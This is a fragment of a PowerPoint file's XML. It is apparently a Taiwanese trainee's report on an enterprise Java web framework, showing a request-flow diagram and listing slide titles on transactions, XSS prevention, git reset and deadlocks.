            <a:srgbClr val="9EDABB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流程圖: 程序 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9365463" y="935777"/>
            <a:ext cx="2008908" cy="1131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Dispatcher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89948" y="3322890"/>
            <a:ext cx="7575119" cy="2798033"/>
            <a:chOff x="965027" y="2181777"/>
            <a:chExt cx="5274310" cy="1948180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="圖片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5027" y="2181777"/>
              <a:ext cx="5274310" cy="1948180"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="直線單箭頭接點 12"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4263242" y="2648197"/>
              <a:ext cx="23750" cy="1187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4766875" y="6077868"/>
            <a:ext cx="5116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XXWeb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servlet/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HttpDispatcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/XXT0_0200/prompt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35584" y="139067"/>
            <a:ext cx="2803635" cy="52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Container</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="32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0500" y="1314450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doPost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8328" y="1410126"/>
            <a:ext cx="363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Log4jAwareDispatcher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175097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-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>144: aload_1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89472" y="5136463"/>
            <a:ext cx="265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159599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super.doAction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="24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5026011" y="3139198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0500" y="3158268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doGet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04875" y="3212669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HttpDispatcher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90500" y="5082062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doTrx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>141: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>aconst_null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737" y="5173577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HtmlRequestHandler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159923" y="1313144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18779" y="1365056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BeanProxy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159694" y="1309007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smtClean="0"/>
              <a:t>execute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118550" y="1360919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TxHandler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159694" y="3143855"/>
            <a:ext cx="38100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2400" dirty="0" err="1" smtClean="0"/>
              <a:t>doAction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61513" y="3174592"/>
            <a:ext cx="18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TxBean</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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095" y="4379554"/>
            <a:ext cx="4104013" cy="895114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="直線單箭頭接點 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2095500" y="2495550"/>
            <a:ext cx="0" cy="66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7" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2095500" y="4339368"/>
            <a:ext cx="0" cy="7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9" idx="3"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4000500" y="5672612"/>
            <a:ext cx="174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13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6064599" y="4324955"/>
            <a:ext cx="15498" cy="75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0"/>
            <a:endCxn id="21" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6064599" y="2494244"/>
            <a:ext cx="324" cy="64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1" idx="3"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7969923" y="1899557"/>
            <a:ext cx="189771" cy="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2"/>
            <a:endCxn id="25" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10064694" y="2490107"/>
            <a:ext cx="0" cy="65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212571" y="4804245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doQuery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8B9C-461C-4D07-92C0-6864CF8B08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5360</TotalTime>
  <Words>3769</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>785</Paragraphs>
  <Slides>56</Slides>
  <Notes>43</Notes>
  <HiddenSlides>2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56</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="73" baseType="lpstr">
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>inherit</vt:lpstr>
      <vt:lpstr>細明體</vt:lpstr>
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Aharoni</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>多面向</vt:lpstr>
      <vt:lpstr>新人期末報告</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>eBAF</vt:lpstr>
      <vt:lpstr>MVC</vt:lpstr>
      <vt:lpstr>eBAF架構</vt:lpstr>
      <vt:lpstr>Init Servlet</vt:lpstr>
      <vt:lpstr>Request</vt:lpstr>
      <vt:lpstr>Request</vt:lpstr>
      <vt:lpstr>後</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>JSTL&amp;EL</vt:lpstr>
      <vt:lpstr>JSP</vt:lpstr>
      <vt:lpstr>JSTL</vt:lpstr>
      <vt:lpstr>Exception</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Transaction</vt:lpstr>
      <vt:lpstr>交易管理</vt:lpstr>
      <vt:lpstr>交易控制</vt:lpstr>
      <vt:lpstr>交易四大原則</vt:lpstr>
      <vt:lpstr>交易控制-連線</vt:lpstr>
      <vt:lpstr>交易控制-連線</vt:lpstr>
      <vt:lpstr>隔離等級</vt:lpstr>
      <vt:lpstr>Dirty read</vt:lpstr>
      <vt:lpstr>Unrepeatable Read</vt:lpstr>
      <vt:lpstr>Phantom  Read</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>XSS-Types</vt:lpstr>
      <vt:lpstr>XSS-Preventive measures</vt:lpstr>
      <vt:lpstr>XSS-Preventive measures</vt:lpstr>
      <vt:lpstr>Git-reset</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Reset</vt:lpstr>
      <vt:lpstr>Reset-Soft</vt:lpstr>
      <vt:lpstr>Reset-Mixed</vt:lpstr>
      <vt:lpstr>Reset-Hard</vt:lpstr>
      <vt:lpstr>Reset-Hard</vt:lpstr>
      <vt:lpstr>Reset-Hard</vt:lpstr>
      <vt:lpstr>心得.Q&amp;A</vt:lpstr>
      <vt:lpstr>Thanks for your attention</vt:lpstr>
      <vt:lpstr>補充</vt:lpstr>
      <vt:lpstr>後端導特定頁</vt:lpstr>
      <vt:lpstr>((((((((交易控制</vt:lpstr>
      <vt:lpstr>交易控制??</vt:lpstr>
      <vt:lpstr>checkCompanyPage?</vt:lpstr>
      <vt:lpstr>exception</vt:lpstr>
      <vt:lpstr>Try catch finally</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>rootException</vt:lpstr>
      <vt:lpstr>MessageUtil</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>LOG</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>死結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盛昱叡</dc:creator>
  <cp:lastModifiedBy>盛昱叡</cp:lastModifiedBy>
  <cp:revision>285</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-12-05T07:13:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-22T07:56:10Z</dcterms:modified>
</cp:coreProperties>
</file>